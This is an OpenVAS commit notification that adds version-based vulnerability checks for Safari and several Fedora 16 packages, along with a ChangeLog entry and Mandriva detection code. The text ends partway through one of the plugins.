[Openvas-commits] r13810 - in trunk/openvas-plugins: . scripts
scm-commit at wald.intevation.org
scm-commit at wald.intevation.org
Tue Jul 31 15:07:27 CEST 2012
Author: antu123
Date: 2012-07-31 15:07:25 +0200 (Tue, 31 Jul 2012)
New Revision: 13810
Added:
trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl
trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl
trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl
trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl
trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl
trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl
trunk/openvas-plugins/scripts/gb_ubuntu_USN_1518_1.nasl
trunk/openvas-plugins/scripts/gb_ubuntu_USN_1519_1.nasl
trunk/openvas-plugins/scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl
trunk/openvas-plugins/scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/gather-package-list.nasl
trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl
Log:
Added new plugins and New auto generated plugins.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2012-07-31 08:12:11 UTC (rev 13809)
+++ trunk/openvas-plugins/ChangeLog 2012-07-31 13:07:25 UTC (rev 13810)
@@ -1,5 +1,42 @@
2012-07-31 Antu Sanadi <santu at secpod.com>
+ * scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl,
+ scripts/gb_httpdx_post_req_bof_vuln.nasl,
+ scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl,
+ scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl,
+ scripts/gb_wireshark_mac_lte_dissector_bof_vuln_mac.nasl,
+ scripts/gb_wireshark_asn1ber_dissector_dos_vuln_mac.nasl:
+ Added new plugins.
+
+ * scripts/gb_httpdx_server_detect.nasl:
+ Updated to modern product detection.
+
+ * scripts/gb_fedora_2012_10727_ganglia_fc16.nasl,
+ scripts/gb_fedora_2012_10822_firefox_fc16.nasl,
+ scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl,
+ scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl,
+ scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl,
+ scripts/gb_ubuntu_USN_1518_1.nasl,
+ scripts/gb_ubuntu_USN_1519_1.nasl,
+ scripts/gb_fedora_2012_10411_kdepim_fc16.nasl,
+ scripts/gb_fedora_2012_10819_exif_fc16.nasl,
+ scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl,
+ scripts/gb_fedora_2012_10887_nsd_fc16.nasl,
+ scripts/gb_fedora_2012_10897_puppet_fc16.nasl,
+ scripts/gb_fedora_2012_10929_bacula_fc16.nasl,
+ scripts/gb_fedora_2012_10934_dropbear_fc16.nasl,
+ scripts/gb_mandriva_MDVSA_2012_112.nasl,
+ scripts/gb_mandriva_MDVSA_2012_113.nasl,
+ scripts/gb_mandriva_MDVSA_2012_115.nasl,
+ scripts/gb_mandriva_MDVSA_2012_117.nasl,
+ scripts/gb_mandriva_MDVSA_2012_119.nasl:
+ Added new auto generated pllugins.
+
+ * scripts/gather-package-list.nasl:
+ Updated to support for mandriva enterprise server 5.2
+
+2012-07-31 Antu Sanadi <santu at secpod.com>
+
* scripts/kerio_wrf_management_detection.nasl,
scripts/ldap_null_base.nasl,
scripts/linux_icmp_sctp_DoS.nasl,
Modified: trunk/openvas-plugins/scripts/gather-package-list.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gather-package-list.nasl 2012-07-31 08:12:11 UTC (rev 13809)
+++ trunk/openvas-plugins/scripts/gather-package-list.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -124,6 +124,7 @@
"MNDK_2010.1", "cpe:/o:mandriva:linux:2010.1",
"MNDK_2011.0", "cpe:/o:mandriva:linux:2011.0",
"MNDK_mes5", "cpe:/o:mandriva:enterprise_server:5",
+ "MNDK_mes5.2", "cpe:/o:mandriva:enterprise_server:5",
# CentOS
"CentOS2", "cpe:/o:centos:centos:2",
@@ -453,6 +454,14 @@
exit(0);
}
+if("Mandriva Linux Enterprise Server release 5.2" >< rls) {
+ buf = ssh_cmd(socket:sock, cmd:"/bin/rpm -qa --qf '%{NAME}~%{VERSION}~%{RELEASE};'");
+ set_kb_item(name: "ssh/login/rpms", value: ";" + buf);
+ log_message(port:port, data:string("We are able to login and detect that you are running ", rls));
+ register_detected_os(os:rls, oskey:"MNDK_mes5.2");
+ exit(0);
+}
+
if("Mandriva Linux release 2011.0" >< rls) {
buf = ssh_cmd(socket:sock, cmd:"/bin/rpm -qa --qf '%{NAME}~%{VERSION}~%{RELEASE};'");
set_kb_item(name: "ssh/login/rpms", value: ";" + buf);
Added: trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,142 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apple Safari Multiple Vulnerabilities - July 2012 (Mac OS X)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802924);
+ script_version("$Revision$");
+ script_cve_id("CVE-2011-3426", "CVE-2011-3016", "CVE-2011-3021", "CVE-2011-3027",
+ "CVE-2011-3032", "CVE-2011-3034", "CVE-2011-3035", "CVE-2011-3036",
+ "CVE-2011-3037", "CVE-2011-3038", "CVE-2011-3039", "CVE-2011-3040",
+ "CVE-2011-3041", "CVE-2011-3042", "CVE-2011-3043", "CVE-2011-3044",
+ "CVE-2011-3050", "CVE-2011-3053", "CVE-2011-3059", "CVE-2011-3060",
+ "CVE-2011-3064", "CVE-2011-3068", "CVE-2011-3069", "CVE-2011-3071",
+ "CVE-2011-3073", "CVE-2011-3074", "CVE-2011-3075", "CVE-2011-3076",
+ "CVE-2011-3078", "CVE-2011-3081", "CVE-2011-3086", "CVE-2011-3089",
+ "CVE-2011-3090", "CVE-2011-3913", "CVE-2011-3924", "CVE-2011-3926",
+ "CVE-2011-3958", "CVE-2011-3966", "CVE-2011-3968", "CVE-2011-3969",
+ "CVE-2011-3971", "CVE-2011-3067", "CVE-2011-2845", "CVE-2012-0678",
+ "CVE-2012-0679", "CVE-2012-0680", "CVE-2012-0682", "CVE-2012-0683",
+ "CVE-2012-1520", "CVE-2012-1521", "CVE-2012-3589", "CVE-2012-3590",
+ "CVE-2012-3591", "CVE-2012-3592", "CVE-2012-3593", "CVE-2012-3594",
+ "CVE-2012-3595", "CVE-2012-3596", "CVE-2012-3597", "CVE-2012-3599",
+ "CVE-2012-3600", "CVE-2012-3603", "CVE-2012-3604", "CVE-2012-3605",
+ "CVE-2012-3608", "CVE-2012-3609", "CVE-2012-3610", "CVE-2012-3611",
+ "CVE-2012-3615", "CVE-2012-3618", "CVE-2012-3620", "CVE-2012-3625",
+ "CVE-2012-3626", "CVE-2012-3627", "CVE-2012-3628", "CVE-2012-3629",
+ "CVE-2012-3630", "CVE-2012-3631", "CVE-2012-3633", "CVE-2012-3634",
+ "CVE-2012-3635", "CVE-2012-3636", "CVE-2012-3637", "CVE-2012-3638",
+ "CVE-2012-3639", "CVE-2012-3640", "CVE-2012-3641", "CVE-2012-3642",
+ "CVE-2012-3644", "CVE-2012-3645", "CVE-2012-3646", "CVE-2012-3653",
+ "CVE-2012-3655", "CVE-2012-3656", "CVE-2012-3661", "CVE-2012-3663",
+ "CVE-2012-3664", "CVE-2012-3665", "CVE-2012-3666", "CVE-2012-3667",
+ "CVE-2012-3668", "CVE-2012-3669", "CVE-2012-3670", "CVE-2012-3674",
+ "CVE-2012-3678", "CVE-2012-3679", "CVE-2012-3680", "CVE-2012-3681",
+ "CVE-2012-3682", "CVE-2012-3683", "CVE-2012-3686", "CVE-2012-3689",
+ "CVE-2012-3690", "CVE-2012-3691", "CVE-2012-2815", "CVE-2012-3693",
+ "CVE-2012-3694", "CVE-2012-3695", "CVE-2012-3696", "CVE-2012-3697",
+ "CVE-2012-3650");
+ script_bugtraq_id(50124, 52031, 52271, 52674, 52762, 52913, 53309, 53540, 51041,
+ 51641, 51911, 50360, 54683, 54692, 54688, 54680, 54686, 54696,
+ 54687, 54203, 54693, 54694, 54695, 54700, 54697, 54703);
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 16:35:41 +0530 (Mon, 30 Jul 2012)");
+ script_name("Apple Safari Multiple Vulnerabilities - July 2012 (Mac OS X)");
+ desc = "
+ Overview: This host is installed with Apple Safari web browser and is prone
+ to multiple vulnerabilities.
+
+ Vulnerability Insight:
+ For more details about the vulnerabilities refer the reference section.
+
+ Impact:
+ Successful exploitation will let the attacker to disclose potentially
+ sensitive information, conduct cross-site scripting and compromise a user's
+ system.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ Apple Safari versions prior to 6.0
+
+ Fix: Upgrade to Apple Safari version 6.0 or later,
+ For updates refer, http://www.apple.com/safari/download/
+
+ References:
+ http://support.apple.com/kb/HT5400
+ http://secunia.com/advisories/50058/
+ http://securitytracker.com/id/1027307
+ http://lists.apple.com/archives/security-announce/2012/Jul/msg00000.html ";
+
+ script_description(desc);
+ script_summary("Check for the version of Apple Safari on Mac OS X");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2012 Greenbone Networks GmbH");
+ script_family("General");
+ script_dependencies("macosx_safari_detect.nasl");
+ script_require_keys("AppleSafari/MacOSX/Version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+osName = "";
+osVer = "";
+safVer = "";
+
+## Get the OS name
+osName = get_kb_item("ssh/login/osx_name");
+if(!osName){
+ exit (0);
+}
+
+## Get the OS Version
+osVer = get_kb_item("ssh/login/osx_version");
+if(!osVer){
+ exit(0);
+}
+
+## Check for the Mac OS X and Mac OS X Server
+if("Mac OS X" >< osName)
+{
+ ## Check the affected OS versions
+ if(version_is_equal(version:osVer, test_version:"10.7.4"))
+ {
+ safVer = get_kb_item("AppleSafari/MacOSX/Version");
+ if(!safVer){
+ exit(0);
+ }
+
+ ## Grep for Apple Safari Versions prior to 6.0
+ if(version_is_less(version:safVer, test_version:"6.0")){
+ security_hole(0);
+ }
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_apple_safari_mult_vuln_jul12_macosx.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for kdepim FEDORA-2012-10411
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ KDE PIM (Personal Information Manager) applications, including:
+ * akregator: feed aggregator
+ * blogilo: blogging application, focused on simplicity and usability
+ * kmail: email client
+ * knode: newsreader
+ * knotes: sticky notes for the desktop
+ * kontact: integrated PIM management
+ * korganizer: journal, appointments, events, todos
+
+
+ Affected Software/OS:
+ kdepim on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084262.html ";
+
+if(description)
+{
+ script_id(864574);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:09 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3413");
+ script_tag(name:"cvss_base", value:"7.8");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10411");
+ script_name("Fedora Update for kdepim FEDORA-2012-10411");
+
+ script_description(desc);
+ script_summary("Check for the Version of kdepim");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"kdepim", rpm:"kdepim~4.8.4~4.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10411_kdepim_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for ganglia FEDORA-2012-10727
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Ganglia is a scalable, real-time monitoring and execution environment
+ with all execution requests and statistics expressed in an open
+ well-defined XML format.
+
+
+ Affected Software/OS:
+ ganglia on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084196.html ";
+
+if(description)
+{
+ script_id(864559);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10727");
+ script_name("Fedora Update for ganglia FEDORA-2012-10727");
+
+ script_description(desc);
+ script_summary("Check for the Version of ganglia");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"ganglia", rpm:"ganglia~3.1.7~5.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10727_ganglia_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for exif FEDORA-2012-10819
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Small command-line utility to show EXIF information hidden
+ in JPEG files.
+
+
+ Affected Software/OS:
+ exif on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084273.html ";
+
+if(description)
+{
+ script_id(864571);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:06 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2845");
+ script_tag(name:"cvss_base", value:"6.4");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10819");
+ script_name("Fedora Update for exif FEDORA-2012-10819");
+
+ script_description(desc);
+ script_summary("Check for the Version of exif");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"exif", rpm:"exif~0.6.21~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10819_exif_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for firefox FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Mozilla Firefox is an open-source web browser, designed for standards
+ compliance, performance and portability.
+
+
+ Affected Software/OS:
+ firefox on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084177.html ";
+
+if(description)
+{
+ script_id(864562);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for firefox FEDORA-2012-10822");
+
+ script_description(desc);
+ script_summary("Check for the Version of firefox");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"firefox", rpm:"firefox~14.0.1~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_firefox_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for thunderbird-lightning FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Lightning brings the Sunbird calendar to the popular email client,
+ Mozilla Thunderbird. Since it's an extension, Lightning is tightly
+ integrated with Thunderbird, allowing it to easily perform email-related
+ calendaring tasks.
+
+
+ Affected Software/OS:
+ thunderbird-lightning on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084175.html ";
+
+if(description)
+{
+ script_id(864560);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for thunderbird-lightning FEDORA-2012-10822");
+
+ script_description(desc);
+ script_summary("Check for the Version of thunderbird-lightning");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"thunderbird-lightning", rpm:"thunderbird-lightning~1.6~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird-lightning_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for thunderbird FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Mozilla Thunderbird is a standalone mail and newsgroup client.
+
